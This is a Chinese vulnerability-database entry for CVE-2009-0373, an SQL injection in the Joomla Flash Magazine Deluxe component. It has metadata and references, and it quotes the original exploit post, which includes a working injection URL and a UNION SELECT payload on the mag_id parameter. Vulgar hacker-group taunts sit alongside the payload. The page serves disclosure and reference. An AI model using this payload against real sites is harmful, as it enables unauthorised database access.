ElearningForce Flash Magazine Deluxe SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117289 漏洞类型 SQL注入
发布时间 2009-01-26 更新时间 2009-02-10
CVE编号 CVE-2009-0373 CNNVD-ID CNNVD-200901-466
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7881
https://cxsecurity.com/issue/WLB-2009020079
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-466
|漏洞详情
Joomla!是一款开放源码的内容管理系统(CMS)。Joomla!ElearningForceFlashMagazineDeluxe(com_flashmagazinedeluxe)组件中存在SQL注入漏洞。远程攻击者可以借助对index.php的杂志操作中的杂志id参数,执行任意的SQL指令。
|漏洞EXP
www.turkguvenligi.info / Author : TurkGuvenligi / Mail : admin@turkguvenligi.info

t4cs1zkr4L - Agd_scorp - TheHacker - Fatih - SuSkuN - Zec - DreamTurk - Mr.SheYtaN - Ghost61 - BLaSteR - Desquner

Very Very Thanks : TurkguvenLigi Members - Terrorist Crew

Joomla Component Flash Magazine Deluxe Remote Sql Injection

http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL

companent down bro : http://www.elearningforce.biz/flash-magazine-deluxe/flash-magazine-deluxe-description.html

SQL : union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

Are you ready ? , isko s2mi 7.

Hop hop isko top isko , hop hop isko göt isko...

Note : İsko[bknz:öküz]'un makinemize çektigi agır ddos tan doLayı server yeniLeniyor...

çok yakında [TG] online...İsko artık sende kabahat buLmuyom seni o mahaLLede barındıran

muhtarın a.Q...

# milw0rm.com [2009-01-26]
|参考资料

来源:XF
名称:flashmagazine-index-sql-injection(48226)
链接:http://xforce.iss.net/xforce/xfdb/48226
来源:BID
名称:33455
链接:http://www.securityfocus.com/bid/33455
来源:MILW0RM
名称:7881
链接:http://www.milw0rm.com/exploits/7881
来源:VUPEN
名称:ADV-2009-0249
链接:http://www.frsirt.com/english/advisories/2009/0249
来源:SECUNIA
名称:33646
链接:http://secunia.com/advisories/33646